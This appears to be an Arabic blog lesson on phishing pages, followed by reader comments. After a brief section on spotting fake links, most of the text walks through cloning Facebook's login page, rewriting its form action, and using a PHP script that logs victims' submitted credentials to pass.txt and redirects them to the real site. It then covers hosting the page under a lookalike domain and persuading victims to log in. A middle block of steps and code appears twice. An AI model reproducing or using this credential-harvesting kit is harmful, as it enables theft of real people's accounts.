ماهي الصفحة المزورة ؟ ... هى رسالة تصلك على بريدك الالكتروني من السارق ايا كان بريدك سواء ياهو او فيس بوك او هوتميل او جي ميل .. او paypal ..إلخ ... ومرفق معها لينك او رابط يشبه إلى حد ما صفحة او شكل صفحة الفيس بوك مثلا ولكن في الحقيقة هي صفحة نسخة طبق الاصل من الفيس بوك الحقيقي !! وعندما تقوم بإدخال بياناتك كالايميل وكلمة المرور ستصل بياناتك للسارق او الهاكر الذي يريد سرقة اميلك ... وتندرج هذة الطريقة تحت مسمى هندسة اجتماعية ... لان على حسب ذكاء الهاكر يتم خداعك ... يجب عليك ان تقنع ضحيتك بإسلوب مقنع حتى يدخل على الرابط الخاص بك و يجد صفحتك المزورة وينخدع بها ويدخل بياناته ... وبهذة الطريقة تتم سرقة اغلب انواع الحسابات المعروفة او الحسابات البنكية الالكترونية على الانترنت
وقد حدث معي شخصيا عبر الفيس بوك خدعة مثل هذة حيث ان احد اطفال الهكر كان عامل اكونت او اميل فيس بوك اسمه faceebo0k server وكان يمثل دور ادارة الفيس بوك ههههههههههههه ... ثم ارسل لي رابط وقال في رسالته بالحرف : عزيزي العميل لقد وصل إلينا العديد من الابلاغات على حسابك وسيتم اغلاق حسابك نهائيا ان لم تقوم بإدخال بياناتك من خلال الرابط التالي .... ثم وضع لي الرابط وكانت صفحة بهذا الشكل بالضبط
لاحظتم اخواني !؟ انها تشبه الفيس بوك كثيرا او يمكننا ان نقول انها بالفعل فيس بوك !!! هكذا يتم خداعك
كيف تعرف انها صفحة مزورة حتى لا يتم خداعك ؟
اولا : من خلال الرابط المرسل إليك ... رابط الفيس بوك الحقيقي هو facebook.com كلمة facebook يأتي بعدها مباشرة .com انما اذا وجدت بينهم اى كلمة فأعلموا اخى واختي ان هذة صفحة مزورة ويجب ان تاخذ حذرك منها .. بهذا الشكل مثلا faceeboook.veroo.com لاحظتم كلمة faceeboook غير صحيحة وتوجد كلمة veroo قبل .com وهذا يعني انها صفحة مزورة
ثانيا : لا تصدق ان هناك شيء مجاني في هذا الزمن ههههههههه الكثير من الهكر عندما يرسلون رابط مزور يقولوا مثلا انك ستربح المبلغ هذا او ستأخذ هدية او ستتصل مجانا من الانترنت بأي تليفون ... إلخ من الاغراءات المتنوعة فأحذر من مثل هذة الرسائل
والان سأقوم بشرح كيف تقوم بتصميم الصفحة المزورة من الصفر للنهاية
في البداية اود ان تعرفوا شيء .. وهو انه ليس من الضروري او مش شرط انك تقوم بعمل صفحة مزورة لموقع معروف فقط زى فيس بوك مثلا او ياهو او هوتميل .... وانما ممكن تعمل موقع مزور بفكرة جديدة ... يعني تعمل صفحة مزورة فيها بعض الخانات الفاضية و زر ارسال وصورة كاميرا ... وترسلها للضحية وتقول في رسالتك على سبيل المثال : دلوقتي ممكن اى حد يقدر يفتح كاميرا اى حد تاني غصب عنه فقط قم بوضع اميلك وباسووردك واميل الهدف واضغط اوك هيفتحلك الكمرا بتاعتو................ في الحقيقة البيانات دى هتوصلك انت وهو بعد لما يدخل البيانات هيتحول على اى موقع تانى انت ستقوم بتحديده عند تصميم الصفحة
سنبدء اولا بالطريقة الاسهل وهو كيفية عمل صفحة مزورة لموقع مشهور زي فيس بوك او ياهو او هوتميل ..إلخ
تطبيق الشرح هيكون على الفيس بوك ان شاء الله ... نقوم اولا بالدخول على الصفحة التي نريد ان نجعلها مزورة وتعمل لصالحنا
http://www.facebook.com/login.php
الان اضغط كليك يمين بالماوس على اى مكان خالي في الصفحة واختار كلمة View Page Source كما في الصورة التالية
او كما هي مكتوبة عندك على حسب المتصفح الذي تعمل عليه ممكن ان تجدها هكذا View source .. الان وبعد الضغط عليها سيظهر لك السورس كود الخاص بالصفحة والذي يجب التعديل عليه حتى نحصل على صفحة مزورة ... وهذا هو شكل السورس
الان قم بنسخ السورس بالكامل عن طريق الضغط من الكيبورد على Ctrl+A ستلاحظ انه تم التحديد على جميع السورس الكود ثم اضغط من الكيبورد Ctrl+C حتى تنسخ كل ما تم تحديده او بالطريقة التقليدية قم بالتحديد على السورس كله بالماوس ثم كليك يمين واختار copy .... والان قم باغلاق المتصفح والمربع بتاع السورس ايضا ... ثم افتح المفكرة او Notepad
start >> All Programs >> Accessories >> Notepad
واضغط على Ctrl+V او كليك يمين في المفكرة بالماوس واضغط Paste للصق السورس كود ... والان تم نسخ السورس في المفكرة ... سنقوم الان بعمل تعديل بسيط على السورس حتى يتحول لصفحة مزورة ... تابعوا معي بالصور :
1
2
الان ظهر لنا مستطيل صغير كما في الصورة السابقة ... سنبحث الان عن كلمة Action و اى موقع نريد ان نصمم له صفحة مزورة نبحث ايضا عن هذة الكلمة في السورس لانها هي اساس صفحتنا المزورة ... وبعد كتابتها في المستطيل الذي امامك اضغط Find Next ستجد انه وضع عليها علامة وقام بتحديدها ... وممكن مش يجيبها من اول مرة لان ممكن تكون مكررة بالاعلى .... وفى هذة الحالة نضغط مرة اخرى على Find Next في نفس مستطيل البحث حتى نصل للكلمة المطلوبة ... كما في الصور التالية :
هنا ظهر لي اول كلمة بنفس الاسم
ولكنها ليست الكلمة المطلوبة ... وعندما قمت بالضغط مرة اخرى على Find Next فظهرت لى الكلمة المطلوبة
بس انا سامع حد بيسألني دلوقتي ويقول : وكيف علمت ان هذة هى المطلوبة ولماذا لا تكون التي قبلها مثلا !!؟ .... والاجابة : لان بجانبها لينك او رابط ... وكذلك في اي صفحة مزورة لاي موقع تاني زي ياهو او بايبال او جي ميل ... ستجد بجانب كلمة اكشن رابط .... والان قم بحذف الرابط الذي بجانب كلمة Action ... ولكن كن حذر ولا تحذف الاقواس او كلمة اكشن ... وعندما تحذف الرابط اكتب في مكانه هذة الكلمة بالضبط help.php وبعدين امشي بالسهم بإتجاه اليمين قليلا حتى يمكنك مشاهدة باقي الكلام ... ستشاهد هذة الكلمة
method="post"i
فقط قم بتغيير كلمة post إلى get حتى يصبح الشكل النهائي كما في الصورة التالية :
ويأتي سؤال اخر يقول لي : لماذا حذفت الرابط ووضعت help.php ؟ ... والاجابة هى لان هذا هو اسم الملف الذي سنقوم بعمله الان بعدما ننتهى اولا من الذي امامنا وهو الذي ستكون مهمته ان يقوم بإستقبال بيانات الضحية من الصفحة المزورة ليقوم بإرسالها لك على ملف اخر يسمى pass.txt ... يعني يقوم بدور الوسيط بين الصفحة المزورة والملف الذي ستصلك فيه البيانات
والان انتهينا من تعديل صفحتنا المزورة .... من قائمة File اختر Save As ونقوم بحفظه على الديسك توب او سطح المكتب بهذا الاسم بالضبط index.html ثم نذهب على سطح المكتب ونتأكد انه موجود وتم الحفظ ... ثم نغلق كل شيء مفتوح امامنا الان ... ونعمل تجربة ونقوم بفتح صفحتنا المزورة نشوف شكلها ... ستلاحظ انها نسخة طبق الاصل من الفيس بوك الحقيقي ... والان نغلق الصفحة
سندخل الان في الخطوة التالية وهى انشاء الملف الذي تكلما عنه سابقا وهو help.php قم بفتح المفكرة او Notepad كما فعلنا سابقا وقم بوضع الكود التالي بداخلها بدون ان تنقص علامة واحدة او حرف منه
<?php
$handle = fopen("pass.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
$redirect = "http://www.facebook.com";
header("Location:$redirect");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
نلاحظ ان السطر الثاني من الكود فيه كلمة pass.txt ... هكذا انت كأنك تقول له ارسل لي البيانات على الملف الذي يسمى pass.txt ... اما في السطر الثامن فأنت تطلب منه ان يقوم بتحويل الضحية مباشرة بعد ادخال البيانات إلى عنوان صفحة الفيس بوك الحقيقية حتى لا يشك الضحية انها صفحة مزورة ههههههههههه ... و اى رابط ستضعه بدل من الفيس بوك سيتحول إليه الضحية بعد ادخال البيانات ... كما تحب انت ... طبعا انا اقوم بتوضيح هذة التفاصيل حتى يمكنك عمل اى نوع من الصفحات المزورة بسهولةوتكون فاهم الفكرة ... مش مجرد بتطبق ورايا وبس ... فلا فائدة ان تقوم بالتطبيق بدون فهم او كما نقول في مصر ... حافظ مش فاهم ههههههههههه
والان بعد وضع الكود في المفكرة ... من قائمة File نختار ايضا Save As ثم نحفظه على سطح المكتب ايضا بإسم help.php ... ونتأكد انه تم حفظه على الديسك توب ... ثم نغلق كل شيء امامنا .... ثم نفتح مفكرة جديدة ... ولكن سنتركها خالية ومن قائمة File نختار Save As ثم نحفظها على سطح المكتب بإسم pass.txt ..... و كدة نكون خلصنا صفحتنا المزورة بنجاح .... ولدينا 3 ملفات على سطح المكتب الان
ناقص شيء اخير وهو انشاء رابط للصفحة المزورة وذلك يتم برفع الثلاثة ملفات على احد الاستضافات المجانية حتى تأخذ رابط لصفحتك ويكون جاهز للارسال ... وطريقة عمل موقع على استضافة مجانية سهل جدا وسنقوم بشرح الطريقة
والان انتهينا من تعديل صفحتنا المزورة .... من قائمة File اختر Save As ونقوم بحفظه على الديسك توب او سطح المكتب بهذا الاسم بالضبط index.html ثم نذهب على سطح المكتب ونتأكد انه موجود وتم الحفظ ... ثم نغلق كل شيء مفتوح امامنا الان ... ونعمل تجربة ونقوم بفتح صفحتنا المزورة نشوف شكلها ... ستلاحظ انها نسخة طبق الاصل من الفيس بوك الحقيقي ... والان نغلق الصفحة
سندخل الان في الخطوة التالية وهى انشاء الملف الذي تكلما عنه سابقا وهو help.php قم بفتح المفكرة او Notepad كما فعلنا سابقا وقم بوضع الكود التالي بداخلها بدون ان تنقص علامة واحدة او حرف منه
<?php
$handle = fopen("pass.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
$redirect = "http://www.facebook.com";
header("Location:$redirect");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
نلاحظ ان السطر الثاني من الكود فيه كلمة pass.txt ... هكذا انت كأنك تقول له ارسل لي البيانات على الملف الذي يسمى pass.txt ... اما في السطر الثامن فأنت تطلب منه ان يقوم بتحويل الضحية مباشرة بعد ادخال البيانات إلى عنوان صفحة الفيس بوك الحقيقية حتى لا يشك الضحية انها صفحة مزورة ههههههههههه ... و اى رابط ستضعه بدل من الفيس بوك سيتحول إليه الضحية بعد ادخال البيانات ... كما تحب انت ... طبعا انا اقوم بتوضيح هذة التفاصيل حتى يمكنك عمل اى نوع من الصفحات المزورة بسهولةوتكون فاهم الفكرة ... مش مجرد بتطبق ورايا وبس ... فلا فائدة ان تقوم بالتطبيق بدون فهم او كما نقول في مصر ... حافظ مش فاهم ههههههههههه
والان بعد وضع الكود في المفكرة ... من قائمة File نختار ايضا Save As ثم نحفظه على سطح المكتب ايضا بإسم help.php ... ونتأكد انه تم حفظه على الديسك توب ... ثم نغلق كل شيء امامنا .... ثم نفتح مفكرة جديدة ... ولكن سنتركها خالية ومن قائمة File نختار Save As ثم نحفظها على سطح المكتب بإسم pass.txt ..... و كدة نكون خلصنا صفحتنا المزورة بنجاح .... ولدينا 3 ملفات على سطح المكتب الان
ناقص شيء اخير وهو انشاء رابط للصفحة المزورة وذلك يتم برفع الثلاثة ملفات على احد الاستضافات المجانية حتى تأخذ رابط لصفحتك ويكون جاهز للارسال ... وطريقة عمل موقع على استضافة مجانية سهل جدا وسنقوم بشرح الطريقة
والان اكتب في موقع البحث Google : استضافة مجانية ......... وسيأتي لك بالعديد من الاستضافات المجانية ... وان كتبت في جوجل شرح عمل موقع على استضافة **** وتكتب مكان النجوم اسم الاستضافة .... سيأتي إليك ايضا العديد من الشروحات في المنتديات العربية لكيفية عمل موقع على استضافة مجانية ورفع ملفاتك عليها
ولكن انا افضل هذة الاستضافة الرائعة لاني تعاملت معها شخصيا
http://www.000webhost.com
وبعد ماتدخل عليها ستختار Signup كما في الصورة التالية :
ستفتح لك صفحة الان فيها خانات كما في الصورة التالية :
الخانة الاولى اتركها كما هي ... اما في الخانة الثانية فهي تسألك عن اسم الموقع الذي تريده ... ويمكنك وضع أي اسم حسب صفحتك المزورة اللي انت هتعملها يعني مثلا fiaceboook .... ولاحظ كلمة webege مش شرط ان تجدها كما هي ممكن تبقا متغيرة عادي يعني .... وفي الخانة الثالثة اكتب اسمك انت ... او اسمك المستعار كما يحلو لك ... وفي الخانة الرابعة قم بوضعك بريدك الالكتروني الذي تريد ان يصل إليك رسالة التفعيل عليه ... بس لازم تكتبه كامل يعني لو اميلك ياهو يبقا هتكتب كدة مثلا ahmed_hmada@yahoo.com مهم جدا @yahoo.com .... وفي الخانة قبل الاخيرة ضع الباسوورد الذي تريده وفي الخانة الاخيرة ضع نفس الباسوورد .... ثم اكتب الكلمة التي امامك في المربع ثم ضع علامة بجانب I Agree ثم اضغط Create my Account .... ثم اذهب لبريدك الالكتروني بعد اتمام التسجيل
ستجد رسالة وصلت إليك وفيها لينك اضغط عليه سيفتح لك صفحة بها عنوان موقعك الذي قمت بإنشائه والحالة .... فإن كانت الحالة Active فأعلم ان الموقع جاهز للعمل الان ... اما اذا كانت الحالة Building فأعلم انه مازال تحت الانشاء وسيكون جاهز خلال دقائق او ثواني او ساعة مثلا ... والان بعد تفعيل حسابك ويكون Active ... قم بالخروج من الموقع نهائيا كما في الصورة التالية :
ثم قم بالدخول من البداية
http://www.000webhost.com
ثم اضغط على كلمة members area كما في الصورة التالية :
ثم اكتب اميلك الذي سجلت به في البداية .. ثم الباسوورد وقم بالدخول .... وبعد الدخول ستجد صفحة ظهرت ... اضغط الان على كلمة Go To Cpanel ثم سيفتح لك صفحة اخرى بها اشياء كثيرة ... ابحث عن كلمة File manager واضغط عليها ... سيفتح لك صفحة اخرى ... فأكتب الان الباسوورد الذي كتبته اثناء دخولك في البداية ... واضغط Continue وسيفتح لك صفحة اخرى اضغط على Public html كما هو موضح في الصورة التالية :
ستجد ملف اسمه deafult.php قم بحذفه اولا عن طريق وضع علامة في المربع الصغير بجانب اسم الملف ثم اضغط على delete جهة اليمين لحذف الملف ثم ستظهر علامة صح خضراء اضغط عليها ثم ستشاهد علامة الرجوع للخلف اضغط عليها حتى تعود إلى مكان الملفات مرة اخرى
ثم تضغط على كلمة upload كما في الصورة التالية :
ثم سيفتح لك صفحة اخرى ... اضغط على Browser التي ناحية الشمال ... واختر اول ملف من الملفات الموجودة على سطح المكتب لديك .. هتظهرلك كلمة Browser اخرى اسفل الاولى ... اضغط عليها واختر الملف الثاني من سطح المكتب وهكذا مع الملف الاخير وبعد الانتهاء اضغط على علامة الصح في اعلى الصفحة حتى يتم الرفع ثم سيفتح صفحة اخرى اضغط على علامة الصح مرة اخرى ثم سيفتح صفحة فيها علامة الرجوع للخلف ... اضغط عليها ... وبهذا يكون قد تم رفع الملفات بنجاح .... والان ادخل على الرابط الخاص بموقعك ... والذي هو مثلا www.fiaceeboook.webege.com وطبعا كلمة fiaceeboook هى التي قمت بوضعها اثناء التسجيل ... وعندما تقوم بفتح هذا الرابط الان ستشاهد ظهور موقع الفيس بوك المزور الخاص بك ... ويمكنك ان تقوم بالتجربة وتقوم بإدخال اى بيانات وهمية .... ثم تابع معي الطريقة التالية لاستقبال الباسووردات او البيانات التي ستصلك من الضحية
افعل كما في الصورة التالية حتى تجد البيانات التي ارسلها الضحية وذلك ماستفعله فيما بعد لاستقبال اى بيانات .. فقط قم بالدخول لحسابك على موقع 000webhost واتبع الخطوات المعروفة للوصول لهذا المكان الموضح بالصورة التالية ثم افعل كما في الصورة حتى تجد البيانات
فقط اضغط على كلمة View التي امام الملف pass.txt وستجد كلمات المرور الضحايا او البيانات التي ستصلك من اى ضحية .... واذا لم تجد شيئا فإن الضحية لم يدخل إلى صفحتك المزورة لانه لم يقتنع بها هههههههههههههه او لسة لم يرى رسالتك وعندما يراها سيدخل ... ماعليك إلا الانتظار
وكما وضحنا سابقا ان الاستضافات المجانية عديدة ... فقط ان لم تعجبك هذة الاستضافة فأبحث على جوجل
ملحوظة للبنات هامة جدا : يوجد من يقوم بعمل الصفحة المزورة لجمع بيانات عن اي بنت حتى يصل لرقم الموبايل بتاعها وعنوانها وكل شيء عنها ... فأحذري اختي الفاضلة ... لان ممكن واحد معندوش ضمير يعمل صفحة مزورة لا تطلب منك اى باسوورد ولكن تطلب بياناتك انتي الشخصية ... اسأل الله العلي العظيم ان يحفظ كل بنت مسلمة
والان نكون قد انتهينا بفضل الله من الدرس الثالث ... وانتظروا الدرس القادم ان شاء الله في اقرب وقت وهو سيكون تكملة لموضوع الصفحات المزورة ... والسلام عليكم ورحمة الله وبركاته
انا جربت بس ما في اي \كلمات او معلومات تتسجل بملف الباس pass
ردحذف???
والله ما اعرف شلون اشكرك ..علمتني الهكر اول مرة بحياتي ضضضض
ردحذفاستخدمت اي استضافة؟
حذفهجرب الطريئة
ردحذفGo To Cpanel
ردحذفمش موجوده
نفس المشكله عندي يا ريت لو عرفت الحل قولي
حذفعندي مشكله عدم ظهور Go To Cpanel
ردحذفكيفية تهكير الواتساب برقم الهاتف هل هناك تطبيق ام موقع يقوم بهذه العملية
ردحذف